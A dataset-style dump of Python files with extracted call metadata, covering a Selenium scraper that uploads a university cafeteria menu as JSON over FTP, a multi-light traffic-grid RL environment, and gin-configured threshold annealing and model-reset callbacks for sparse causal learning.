cc_net.minify as minify\n'), ((3458, 3501), 'cc_net.jsonql.open_write', 'jsonql.open_write', (["(tmp_path / 'sample.json')"], {}), "(tmp_path / 'sample.json')\n", (3475, 3501), False, 'from cc_net import jsonql, process_wet_file\n'), ((4334, 4377), 'cc_net.jsonql.open_write', 'jsonql.open_write', (["(tmp_path / 'sample.json')"], {}), "(tmp_path / 'sample.json')\n", (4351, 4377), False, 'from cc_net import jsonql, process_wet_file\n'), ((3522, 3538), 'json.dumps', 'json.dumps', (['mini'], {}), '(mini)\n', (3532, 3538), False, 'import json\n'), ((3977, 3997), 'cc_net.minify.encode_line_ids', 'encode_line_ids', (['[2]'], {}), '([2])\n', (3992, 3997), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((4251, 4271), 'cc_net.minify.encode_line_ids', 'encode_line_ids', (['[3]'], {}), '([3])\n', (4266, 4271), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((4433, 4449), 'json.dumps', 'json.dumps', (['mini'], {}), '(mini)\n', (4443, 4449), False, 'import json\n'), ((1511, 1525), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (1515, 1525), False, 'from pathlib import Path\n')] |
## This Python code runs with Selenium and chromedriver; it visits the site like a normal user and parses the required data.
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import os
from bs4 import BeautifulSoup
import time, datetime
import json
import requests
import sys
import ftplib
chrome_options = Options()
chrome_options.add_argument("--headless")  # no visible browser window
chrome_options.add_argument("--window-size=1920x1080")
# chromedriver.exe is expected next to this script (Windows path separator).
chrome_driver = os.getcwd() +"\\chromedriver.exe"
browser = webdriver.Chrome(chrome_options=chrome_options, executable_path=chrome_driver) #replace with .Firefox(), or with the browser of your choice
url = "http://sks.istanbulc.edu.tr/tr/yemeklistesi"
browser.get(url) #navigate to the page
time.sleep(10)  # give the JavaScript-rendered tab panes time to load
# Tab buttons for the meal categories. NOTE(review): the element ids were
# anonymised to "<KEY>" upstream; restore the real ids before running.
kah_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[1]')
ogle_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[2]')
#aksam_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[3]')
vegan_buton = browser.find_element_by_xpath('//*[@id="4E00590053005F006D004C00500035005500720059003100"]/div/div/div[2]/ul/li[6]')
kumanya_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[4]')
# Accumulator for every parsed menu row; serialised to yemek.json later.
son = {}
son["yemek_liste"] = []
def _ogun_tablolarini_isle(tab_id, ogun_adi, ilk_satir):
    """Parse the menu tables of one tab pane and append rows to ``son``.

    tab_id    -- DOM id of the tab pane (e.g. "tab-kahvalti")
    ogun_adi  -- meal label written into each JSON record
    ilk_satir -- index of the first dish inside the split('\\n') cells
                 (the breakfast tab has one extra leading cell, so it
                 starts at 2; every other tab starts at 1)

    This consolidates five previously duplicated functions; the bare
    ``except:`` clauses were narrowed to ``except Exception`` so that
    KeyboardInterrupt/SystemExit are no longer swallowed.
    """
    time.sleep(5)
    pane = browser.find_element_by_id(tab_id)
    bs = BeautifulSoup(pane.get_attribute('innerHTML'), "lxml")
    for tablo in bs.find_all('table'):
        satirlar = tablo.find_all('tr')
        # Up to four dishes per day; anything missing becomes "---".
        yemekler = []
        for kayma in range(4):
            try:
                yemek = satirlar[1].text.split('\n')[ilk_satir + kayma]
            except Exception:
                yemek = "---"
                print("Oops!", sys.exc_info()[0], "occured.")
            yemekler.append(yemek if yemek != "" else "---")
        try:
            calori = satirlar[2].text.replace("\n", "")
        except Exception:
            calori = "---"
            print("Oops!", sys.exc_info()[0], "occured.")
        # First row holds the date as dd.mm.YYYY; re-emit as ISO-ish string.
        dt = datetime.datetime.strptime(satirlar[0].text.replace("\n", ""), '%d.%m.%Y')
        dt = dt.strftime('%Y-%m-%d %H:%M:%S')
        son["yemek_liste"].append({
            "tarih": dt, "ogun": ogun_adi,
            "yemek1": yemekler[0], "yemek2": yemekler[1],
            "yemek3": yemekler[2], "yemek4": yemekler[3],
            "calori": calori,
        })
def kah_json_olustur():
    # Breakfast cells start at index 2 (one extra leading cell in this tab).
    _ogun_tablolarini_isle("tab-kahvalti", "Kahvaltı", 2)
def ogle_json_olustur():
    _ogun_tablolarini_isle("tab-ogle", "Öğle Yemeği", 1)
def aksam_json_olustur():
    # NOTE(review): reads "tab-ogle", not "tab-aksam", as the original did --
    # the dinner tab appears to reuse the lunch table; confirm this is intended.
    _ogun_tablolarini_isle("tab-ogle", "<NAME>", 1)
def vegan_json_olustur():
    _ogun_tablolarini_isle("tab-vegan", "Vegan", 1)
def kumanya_json_olustur():
    # NOTE(review): the original labelled lunch-box rows "Öğle Yemeği" too;
    # kept for backward compatibility -- confirm consumers expect this value.
    _ogun_tablolarini_isle("tab-kumanya", "Öğle Yemeği", 1)
def dosya_olsutur():
    # Persist the collected menu data as yemek.json in the working directory.
    # (json.dump escapes non-ASCII by default, so the file is plain ASCII.)
    with open('yemek.json', 'w') as outfile:
        json.dump(son, outfile)
def mysql_isleri():
    """Trigger the remote MySQL refresh endpoint (fire-and-forget).

    The URL was redacted to "*****" upstream. A timeout is set so the
    script cannot hang forever if the endpoint is unreachable (requests
    waits indefinitely by default).
    """
    requests.get("*****", timeout=30)
def ftp_yukle():
    """Upload yemek.json over FTP and trigger the MySQL refresh.

    Fixes: the uploaded file handle was never closed (now a ``with``
    block), the redundant function-local ``import ftplib`` is gone
    (already imported at module level), and the unused File2Send /
    Output_Directory locals were removed. Credentials are redacted to
    "****" upstream.
    """
    print("----------------")
    print(" ")
    print("ftp deneniyor...")
    ftp = ftplib.FTP()
    host = "****"
    port = 21
    ftp.connect(host, port)
    print(ftp.getwelcome())
    try:
        print("Giriş Yapılıyor...")
        ftp.login("****", "****")
        time.sleep(6)
        mysql_isleri()
        print("Başarılı")
    except Exception as e:
        print(e)
    try:
        # ``with`` guarantees the local handle is closed even if STOR fails.
        with open('yemek.json', 'rb') as dosya:
            ftp.storbinary('STOR yemek.json', dosya)  # send the file
    except Exception as e:
        print(e)
    ftp.quit()
    print(" ")
    print("----------------")
def sonuc():
    """Upload the current JSON, then scrape every meal tab into ``son``.

    NOTE(review): dosya_olsutur()/ftp_yukle() run *before* the tabs are
    parsed, so the uploaded file holds the previous run's data (or an
    empty list on the first run) -- confirm this ordering is intended.

    Fix: the bare ``except:`` clauses were narrowed to ``except
    Exception`` so KeyboardInterrupt/SystemExit are no longer swallowed;
    all messages are unchanged.
    """
    dosya_olsutur()
    ftp_yukle()
    # Each tab is scraped independently; one failure must not stop the rest.
    try:
        kah_buton.click()
        kah_json_olustur()
    except Exception:
        print("Kahvaltı oluşturalamadı", sys.exc_info()[0])
    try:
        ogle_buton.click()
        ogle_json_olustur()
    except Exception:
        print("Öğle oluşturalamadı", sys.exc_info()[0])
    try:
        # The dinner scrape reuses the lunch button (the dedicated dinner
        # button is commented out at module level).
        ogle_buton.click()
        aksam_json_olustur()
    except Exception:
        print("Akşam oluşturalamadı", sys.exc_info()[0])
    try:
        vegan_buton.click()
        vegan_json_olustur()
    except Exception:
        print("Vegan oluşturalamadı", sys.exc_info()[0])
    try:
        kumanya_buton.click()
        kumanya_json_olustur()
    except Exception:
        print("Kumanya oluşturalamadı", sys.exc_info()[0])
    browser.close()
    print(json.dumps(son))
print("-------------")
sonuc()
time.sleep(5)
mysql_isleri()
print("-----Güncelleme Bitti----")
| [
"selenium.webdriver.chrome.options.Options",
"ftplib.FTP",
"selenium.webdriver.Chrome",
"json.dumps",
"requests.get",
"time.sleep",
"os.getcwd",
"sys.exc_info",
"json.dump"
] | [((351, 360), 'selenium.webdriver.chrome.options.Options', 'Options', ([], {}), '()\n', (358, 360), False, 'from selenium.webdriver.chrome.options import Options\n'), ((521, 599), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'chrome_options', 'executable_path': 'chrome_driver'}), '(chrome_options=chrome_options, executable_path=chrome_driver)\n', (537, 599), False, 'from selenium import webdriver\n'), ((752, 766), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (762, 766), False, 'import time, datetime\n'), ((10543, 10556), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (10553, 10556), False, 'import time, datetime\n'), ((477, 488), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (486, 488), False, 'import os\n'), ((1313, 1326), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1323, 1326), False, 'import time, datetime\n'), ((2857, 2870), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2867, 2870), False, 'import time, datetime\n'), ((4400, 4413), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (4410, 4413), False, 'import time, datetime\n'), ((5938, 5951), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (5948, 5951), False, 'import time, datetime\n'), ((7466, 7479), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (7476, 7479), False, 'import time, datetime\n'), ((9096, 9117), 'requests.get', 'requests.get', (['"""*****"""'], {}), "('*****')\n", (9108, 9117), False, 'import requests\n'), ((9240, 9252), 'ftplib.FTP', 'ftplib.FTP', ([], {}), '()\n', (9250, 9252), False, 'import ftplib\n'), ((10494, 10509), 'json.dumps', 'json.dumps', (['son'], {}), '(son)\n', (10504, 10509), False, 'import json\n'), ((9044, 9067), 'json.dump', 'json.dump', (['son', 'outfile'], {}), '(son, outfile)\n', (9053, 9067), False, 'import json\n'), ((9492, 9505), 'time.sleep', 'time.sleep', (['(6)'], {}), '(6)\n', (9502, 9505), False, 'import time, datetime\n'), ((9983, 9997), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (9995, 
9997), False, 'import sys\n'), ((10097, 10111), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10109, 10111), False, 'import sys\n'), ((10211, 10225), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10223, 10225), False, 'import sys\n'), ((10327, 10341), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10339, 10341), False, 'import sys\n'), ((10450, 10464), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10462, 10464), False, 'import sys\n'), ((1661, 1675), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1673, 1675), False, 'import sys\n'), ((1819, 1833), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1831, 1833), False, 'import sys\n'), ((1977, 1991), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1989, 1991), False, 'import sys\n'), ((2135, 2149), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (2147, 2149), False, 'import sys\n'), ((2296, 2310), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (2308, 2310), False, 'import sys\n'), ((3200, 3214), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3212, 3214), False, 'import sys\n'), ((3358, 3372), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3370, 3372), False, 'import sys\n'), ((3516, 3530), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3528, 3530), False, 'import sys\n'), ((3674, 3688), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3686, 3688), False, 'import sys\n'), ((3835, 3849), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3847, 3849), False, 'import sys\n'), ((4743, 4757), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (4755, 4757), False, 'import sys\n'), ((4901, 4915), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (4913, 4915), False, 'import sys\n'), ((5059, 5073), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5071, 5073), False, 'import sys\n'), ((5217, 5231), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5229, 5231), False, 'import sys\n'), ((5378, 5392), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5390, 5392), False, 'import 
sys\n'), ((6270, 6284), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6282, 6284), False, 'import sys\n'), ((6428, 6442), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6440, 6442), False, 'import sys\n'), ((6586, 6600), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6598, 6600), False, 'import sys\n'), ((6744, 6758), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6756, 6758), False, 'import sys\n'), ((6905, 6919), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6917, 6919), False, 'import sys\n'), ((7800, 7814), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7812, 7814), False, 'import sys\n'), ((7958, 7972), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7970, 7972), False, 'import sys\n'), ((8116, 8130), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8128, 8130), False, 'import sys\n'), ((8274, 8288), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8286, 8288), False, 'import sys\n'), ((8435, 8449), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8447, 8449), False, 'import sys\n')] |
from typing import List, overload
from flow.envs.multiagent.traffic_light_grid import MultiTrafficLightGridPOEnv
from flow.envs.traffic_light_grid import TrafficLightGridPOEnv
from gym.spaces import Box, Discrete
import numpy as np
ID_IDX = 1
class SeqTraffiLightEnv(TrafficLightGridPOEnv):
    """Partially-observed traffic-light grid environment with per-light output.

    Unlike the parent class, :meth:`get_state` returns a *list* with one
    observation vector per traffic light (ordered as in
    ``self.k.traffic_light.get_ids()``), and :meth:`observation_space` is a
    2-D ``Box`` shaped ``(num_traffic_lights, obs_dim)``.
    """
    def __init__(self, env_params, sim_params, network, simulator):
        """Initialize the environment and read the locality parameters.

        ``num_local_lights`` / ``num_local_edges`` (from
        ``env_params.additional_params``) control how many nearby lights and
        edges each agent observes; both default to 4.
        """
        super().__init__(env_params, sim_params, network, simulator=simulator)
        # number of nearest lights to observe, defaults to 4
        self.num_local_lights = env_params.additional_params.get(
            "num_local_lights", 4)
        # number of nearest edges to observe, defaults to 4
        self.num_local_edges = env_params.additional_params.get(
            "num_local_edges", 4)
    @property
    def observation_space(self):
        """State space that is partially observed.
        Velocities, distance to intersections, edge number (for nearby
        vehicles) from each direction, local edge information, and traffic
        light state.
        """
        # NOTE: the Box is two-dimensional -- one row per traffic light.
        # Per-light features: 3 values for each of num_observed vehicles on
        # each of the 4 incoming edges, density + mean speed per local edge,
        # and (direction, currently_yellow) for self + num_local_lights
        # neighbours.
        tl_box = Box(
            low=0.,
            high=1,
            shape=(
                self.num_traffic_lights,
                3 * 4 * self.num_observed +
                2 * self.num_local_edges +
                2 * (1 + self.num_local_lights),
            ),
            dtype=np.float32)
        return tl_box
    def get_state(self):
        """Observations for each traffic light agent.
        :return: dictionary which contains agent-wise observations as follows:
        - For the self.num_observed number of vehicles closest and incoming
        towards traffic light agent, gives the vehicle velocity, distance to
        intersection, edge number.
        - For edges in the network, gives the density and average velocity.
        - For the self.num_local_lights number of nearest lights (itself
        included), gives the traffic light information, including the last
        change time, light direction (i.e. phase), and a currently_yellow flag.
        """
        # Normalization factors
        max_speed = max(
            self.k.network.speed_limit(edge)
            for edge in self.k.network.get_edge_list())
        grid_array = self.net_params.additional_params["grid_array"]
        max_dist = max(grid_array["short_length"], grid_array["long_length"],
                       grid_array["inner_length"])
        # TODO(cathywu) refactor TrafficLightGridPOEnv with convenience
        # methods for observations, but remember to flatten for single-agent
        # Observed vehicle information
        speeds = []
        dist_to_intersec = []
        edge_number = []
        all_observed_ids = []
        for _, edges in self.network.node_mapping:
            local_speeds = []
            local_dists_to_intersec = []
            local_edge_numbers = []
            for edge in edges:
                observed_ids = \
                    self.get_closest_to_intersection(edge, self.num_observed)
                all_observed_ids.append(observed_ids)
                # check which edges we have so we can always pad in the right
                # positions
                local_speeds.extend(
                    [self.k.vehicle.get_speed(veh_id) / max_speed for veh_id in
                     observed_ids])
                local_dists_to_intersec.extend([(self.k.network.edge_length(
                    self.k.vehicle.get_edge(
                        veh_id)) - self.k.vehicle.get_position(
                    veh_id)) / max_dist for veh_id in observed_ids])
                local_edge_numbers.extend([self._convert_edge(
                    self.k.vehicle.get_edge(veh_id)) / (
                    self.k.network.network.num_edges - 1) for veh_id in
                    observed_ids])
                # Pad with "far away, stopped" placeholders so every edge
                # always contributes exactly num_observed entries.
                if len(observed_ids) < self.num_observed:
                    diff = self.num_observed - len(observed_ids)
                    local_speeds.extend([1] * diff)
                    local_dists_to_intersec.extend([1] * diff)
                    local_edge_numbers.extend([0] * diff)
            speeds.append(local_speeds)
            dist_to_intersec.append(local_dists_to_intersec)
            edge_number.append(local_edge_numbers)
        # Edge information
        density = []
        velocity_avg = []
        for edge in self.k.network.get_edge_list():
            ids = self.k.vehicle.get_ids_by_edge(edge)
            if len(ids) > 0:
                # TODO(cathywu) Why is there a 5 here?
                density += [5 * len(ids) / self.k.network.edge_length(edge)]
                velocity_avg += [np.mean(
                    [self.k.vehicle.get_speed(veh_id) for veh_id in
                     ids]) / max_speed]
            else:
                density += [0]
                velocity_avg += [0]
        density = np.array(density)
        velocity_avg = np.array(velocity_avg)
        self.observed_ids = all_observed_ids
        # Traffic light information
        direction = self.direction.flatten()
        currently_yellow = self.currently_yellow.flatten()
        # This is a catch-all for when the relative_node method returns a -1
        # (when there is no node in the direction sought). We add a last
        # item to the lists here, which will serve as a default value.
        # TODO(cathywu) are these values reasonable?
        direction = np.append(direction, [0])
        currently_yellow = np.append(currently_yellow, [1])
        obs = []
        # obs -> [num_light, observation]
        node_to_edges = self.network.node_mapping
        for rl_id in self.k.traffic_light.get_ids():
            rl_id_num = int(rl_id.split("center")[ID_IDX])
            local_edges = node_to_edges[rl_id_num][1]
            local_edge_numbers = [self.k.network.get_edge_list().index(e)
                                  for e in local_edges]
            # Neighbouring lights; _get_relative_node returns -1 when a
            # neighbour does not exist, which selects the default value
            # appended above.
            local_id_nums = [rl_id_num, self._get_relative_node(rl_id, "top"),
                             self._get_relative_node(rl_id, "bottom"),
                             self._get_relative_node(rl_id, "left"),
                             self._get_relative_node(rl_id, "right")]
            observation = np.array(np.concatenate(
                [speeds[rl_id_num], dist_to_intersec[rl_id_num],
                 edge_number[rl_id_num], density[local_edge_numbers],
                 velocity_avg[local_edge_numbers],
                 direction[local_id_nums], currently_yellow[local_id_nums]
                 ]))
            obs.append(observation)
        return obs
| [
"numpy.append",
"numpy.array",
"numpy.concatenate",
"gym.spaces.Box"
] | [((1060, 1229), 'gym.spaces.Box', 'Box', ([], {'low': '(0.0)', 'high': '(1)', 'shape': '(self.num_traffic_lights, 3 * 4 * self.num_observed + 2 * self.\n num_local_edges + 2 * (1 + self.num_local_lights))', 'dtype': 'np.float32'}), '(low=0.0, high=1, shape=(self.num_traffic_lights, 3 * 4 * self.\n num_observed + 2 * self.num_local_edges + 2 * (1 + self.\n num_local_lights)), dtype=np.float32)\n', (1063, 1229), False, 'from gym.spaces import Box, Discrete\n'), ((4827, 4844), 'numpy.array', 'np.array', (['density'], {}), '(density)\n', (4835, 4844), True, 'import numpy as np\n'), ((4868, 4890), 'numpy.array', 'np.array', (['velocity_avg'], {}), '(velocity_avg)\n', (4876, 4890), True, 'import numpy as np\n'), ((5371, 5396), 'numpy.append', 'np.append', (['direction', '[0]'], {}), '(direction, [0])\n', (5380, 5396), True, 'import numpy as np\n'), ((5424, 5456), 'numpy.append', 'np.append', (['currently_yellow', '[1]'], {}), '(currently_yellow, [1])\n', (5433, 5456), True, 'import numpy as np\n'), ((6188, 6413), 'numpy.concatenate', 'np.concatenate', (['[speeds[rl_id_num], dist_to_intersec[rl_id_num], edge_number[rl_id_num],\n density[local_edge_numbers], velocity_avg[local_edge_numbers],\n direction[local_id_nums], currently_yellow[local_id_nums]]'], {}), '([speeds[rl_id_num], dist_to_intersec[rl_id_num], edge_number\n [rl_id_num], density[local_edge_numbers], velocity_avg[\n local_edge_numbers], direction[local_id_nums], currently_yellow[\n local_id_nums]])\n', (6202, 6413), True, 'import numpy as np\n')] |
import gin
import torch
import logging
from sparse_causal_model_learner_rl.metrics import find_value, find_key
@gin.configurable
def AnnealerThresholdSelector(config, config_object, epoch_info, temp,
                              adjust_every=100,
                              multiplier=10,  # allowed slack over the best non-sparse loss
                              source_quality_key=None,
                              non_sparse_threshold_disable=None,
                              additive=True,
                              source_fit_loss_key='no_sparse_fit',
                              gin_variable='ThresholdAnnealer.fit_threshold',
                              **kwargs):
    """Adjust the fit threshold based on a non-sparse model's loss.

    The non-sparse model's fit loss acts as a baseline; the annealer's
    threshold (bound via gin as ``gin_variable``) is set to that baseline
    plus/times ``multiplier``, at most once every ``adjust_every`` epochs.
    """
    try:
        baseline_loss = find_value(epoch_info, source_fit_loss_key)
    except AssertionError:
        # Baseline metric is not available yet; leave the config untouched.
        return config
    logging.info(f"Threshold detector found non-sparse loss {baseline_loss}")
    temp.setdefault('last_hyper_adjustment', 0)
    epoch = epoch_info['epochs']
    if additive:
        proposed = baseline_loss + multiplier
    else:
        proposed = baseline_loss * multiplier
    temp['suggested_hyper'] = proposed
    # Disable annealing while the non-sparse model has not reached the
    # required performance level.
    if non_sparse_threshold_disable is not None \
            and baseline_loss >= non_sparse_threshold_disable:
        temp['suggested_hyper'] = 0.0
    waited_long_enough = epoch - temp['last_hyper_adjustment'] >= adjust_every
    if temp.get('suggested_hyper', None) is not None and waited_long_enough:
        with gin.unlock_config():
            gin.bind_parameter(gin_variable, temp['suggested_hyper'])
        temp['suggested_hyper'] = None
        temp['last_hyper_adjustment'] = epoch
    return config
@gin.configurable
def turn_on_features(m, ctx, logits_on=1.5, gap_threshold=1.1, loss_fcn=None):
    """Turn on features giving better loss.

    For every (output feature, input feature) pair, temporarily force the
    corresponding switch fully off (logits 5/-5) and fully on (-5/5),
    evaluate ``loss_fcn`` in both states, restore the original logits, and
    -- if disabling the feature makes the loss at least ``gap_threshold``
    times worse -- set the logits to ``(-logits_on, logits_on)`` so the
    feature is (softly) enabled.

    Mutates the switch logits of ``m`` in place; assumes ``m`` exposes
    ``n_features``, ``n_additional_features``, ``models`` and
    ``additional_models`` -- TODO confirm against the model class.
    """
    with torch.no_grad():
        for fout in range(m.n_features + m.n_additional_features):
            # Outputs beyond n_features live in the "additional models" list.
            if fout >= m.n_features:
                fout_add = fout - m.n_features
                logits = getattr(m, m.additional_models[fout_add]).switch.logits
            else:
                logits = getattr(m, m.models[fout]).switch.logits
            for fin in range(m.n_features):
                # Remember the original logits so they can be restored after
                # the two probe evaluations.
                orig_logits0, orig_logits1 = logits[0, fin].item(), logits[1, fin].item()
                # trying 0...
                logits[0, fin], logits[1, fin] = 5, -5
                loss_0 = loss_fcn(**ctx)
                if isinstance(loss_0, dict):
                    loss_0 = loss_0['loss']
                loss_0 = loss_0.item()
                # trying 1...
                logits[0, fin], logits[1, fin] = -5, 5
                loss_1 = loss_fcn(**ctx)
                if isinstance(loss_1, dict):
                    loss_1 = loss_1['loss']
                loss_1 = loss_1.item()
                logits[0, fin], logits[1, fin] = orig_logits0, orig_logits1
                # ratio > 1 means the loss is worse with the feature off.
                loss_ratio = loss_0 / loss_1
                if loss_ratio > gap_threshold:
                    logging.info(f'Turn on feature {fout} <- {fin}')
                    logits[0, fin], logits[1, fin] = -logits_on, logits_on
@gin.configurable
def ModelResetter(config, epoch_info, temp,
                  learner=None,
                  gin_annealer_cls='ThresholdAnnealer',
                  trainables=None,
                  reset_weights=True,
                  reset_logits=True,
                  reset_optimizers=False,
                  grace_epochs=2000,  # give that many epochs to try to recover on its own
                  last_context=None,
                  reset_turn_on=False,
                  new_logits=0.0, **kwargs):
    """Re-initialize (parts of) the model when the fit loss stays above the
    annealer's threshold for more than ``grace_epochs`` consecutive epochs.

    Tracks in ``temp['first_not_good']`` the first epoch at which the loss
    exceeded the threshold; a reset clears that marker.
    """
    # Read the metric key and threshold from the annealer's gin bindings so
    # both callbacks always agree on what "good" means.
    source_metric_key = gin.query_parameter(f"{gin_annealer_cls}.source_metric_key")
    try:
        fit_loss = find_value(epoch_info, source_metric_key)
        # logging.warning("Cannot find loss with sparsity, defaulting to fit loss")
    except AssertionError as e:
        return config
    if 'first_not_good' not in temp:
        temp['first_not_good'] = None
    fit_threshold = gin.query_parameter(f"{gin_annealer_cls}.fit_threshold")
    is_good = fit_loss <= fit_threshold
    i = epoch_info['epochs']
    logging.info(f"Resetter found loss {fit_loss} threshold {fit_threshold}, good {is_good} epoch {i} fng {temp['first_not_good']}")
    if is_good:
        temp['first_not_good'] = None
    elif temp['first_not_good'] is None:
        temp['first_not_good'] = i
    elif i - temp['first_not_good'] >= grace_epochs:
        # The model failed to recover within the grace period: reset.
        if reset_weights:
            # Re-initialize all non-switch parameters.
            for key, param in trainables.get('model').named_parameters():
                if 'switch' not in key:
                    logging.info(f'Resetting parameter {key}')
                    if 'bias' in key:
                        torch.nn.init.zeros_(param)
                    else:
                        torch.nn.init.xavier_uniform_(param)
        if reset_logits:
            # Push strongly-off switches back to +/- new_logits so features
            # get another chance to turn on.
            for p in trainables.get('model').switch__params:
                logging.info(f"Resetting switch parameter with shape {p.data.shape}")
                p_orig = p.data.detach().clone()
                p.data[1, p_orig[1] < -new_logits] = -new_logits
                p.data[0, p_orig[1] < -new_logits] = new_logits
        if reset_optimizers:
            learner.create_optimizers()
        if reset_turn_on:
            turn_on_features(m=learner.model, ctx=last_context)
        temp['first_not_good'] = None
@gin.configurable
def ThresholdAnnealer(config, epoch_info, temp,
                      fit_threshold=1e-2,
                      min_hyper=1e-5,
                      learner=None,
                      max_hyper=100,
                      freeze_time=100,
                      freeze_threshold_probas=0.8,
                      adjust_every=100,
                      reset_on_fail=False,
                      source_metric_key='with_sparse_fit',
                      factor=0.5,  # if cool/warm not specified, use this one for both
                      factor_cool=None,  # when increasing the coefficient (regularization -> cooling)
                      factor_heat=None,  # when decreasing the coefficient (no reg -> warming)
                      emergency_heating=False,
                      **kwargs):
    """Increase sparsity if fit loss is low, decrease otherwise.

    Simulated-annealing-style schedule for the sparsity coefficient:
    - loss above ``fit_threshold`` -> "heat" (multiply the coefficient by
      ``factor_heat``, i.e. relax regularization), or reset it to
      ``min_hyper`` when ``reset_on_fail`` is set;
    - loss below the threshold  -> "cool" (divide by ``factor_cool``).
    A cool->heat reversal freezes further adjustments for ``freeze_time``
    epochs (optionally clamping switch probabilities to
    ``freeze_threshold_probas`` during the freeze).
    State is kept in ``temp``; the (possibly modified) ``config`` is returned.
    """
    try:
        fit_loss = find_value(epoch_info, source_metric_key)
        # logging.warning("Cannot find loss with sparsity, defaulting to fit loss")
        logging.info(f"Annealer found loss {fit_loss} {source_metric_key}")
    except AssertionError as e:
        #logging.warning(f"Annealer source metric not found: {source_metric_key}, {e}")
        return config
    # fit_loss = find_value(epoch_info, '/fit/value')
    if factor_cool is None:
        factor_cool = factor
    if factor_heat is None:
        factor_heat = factor
    need_heating = False
    if 'last_hyper_adjustment' not in temp:
        temp['last_hyper_adjustment'] = 0
    i = epoch_info['epochs']
    # While frozen, skip all coefficient adjustments.
    if temp.get('last_freeze_start', -1) >= 0:
        if i - temp.get('last_freeze_start') >= freeze_time:
            logging.warning(f"Freezing finished at {i}!")
            del temp['last_freeze_start']
        else:
            if freeze_threshold_probas is not None:
                # Clamp switch probabilities so they cannot saturate while
                # the schedule is frozen.
                p = learner.model.model.switch.probas
                p.data[p.data > freeze_threshold_probas] = freeze_threshold_probas
            return config
    if fit_loss > fit_threshold:  # FREE ENERGY (loss) IS HIGH -> NEED WARMING (decrease regul coeff)
        if reset_on_fail:
            temp['suggested_hyper'] = min_hyper
        else:
            if config['losses']['sparsity']['coeff'] > min_hyper:
                temp['suggested_hyper'] = config['losses']['sparsity']['coeff'] * factor_heat
                need_heating = True
                temp['suggested_hyper'] = max(min_hyper, temp['suggested_hyper'])
    else:  # FREE ENRGY (loss) is low -> CAN DO COOLING (increase regul coeff)
        if config['losses']['sparsity']['coeff'] < max_hyper:
            temp['suggested_hyper'] = config['losses']['sparsity']['coeff'] / factor_cool
            temp['suggested_hyper'] = min(max_hyper, temp['suggested_hyper'])
    epochs_enough = (i - temp['last_hyper_adjustment'] >= adjust_every)
    # Emergency heating bypasses the adjust_every rate limit.
    if emergency_heating and need_heating:
        epochs_enough = True
    if temp.get('suggested_hyper', None) is not None and epochs_enough:
        if temp['suggested_hyper'] < config['losses']['sparsity']['coeff']:
            direction = 'heat'
        elif temp['suggested_hyper'] > config['losses']['sparsity']['coeff']:
            direction = 'cool'
        else:
            direction = 'same'
        # if were cooling down but now have to warm...
        # freezing the model for some time
        if 'last_direction' in temp and temp['last_direction'] in ['cool', 'same'] and direction == 'heat':
            temp['last_freeze_start'] = i
            logging.warning(f"Starting model freeze at {i}")
        temp['last_direction'] = direction
        config['losses']['sparsity']['coeff'] = temp['suggested_hyper']
        temp['suggested_hyper'] = None
        temp['last_hyper_adjustment'] = i
    return config
@gin.configurable
def threshold_annealer_threshold(**kwargs):
    """Expose the currently configured ThresholdAnnealer fit threshold."""
    parameter_name = 'ThresholdAnnealer.fit_threshold'
    return gin.query_parameter(parameter_name)
| [
"sparse_causal_model_learner_rl.metrics.find_value",
"torch.nn.init.xavier_uniform_",
"gin.bind_parameter",
"gin.query_parameter",
"logging.warning",
"torch.nn.init.zeros_",
"gin.unlock_config",
"torch.no_grad",
"logging.info"
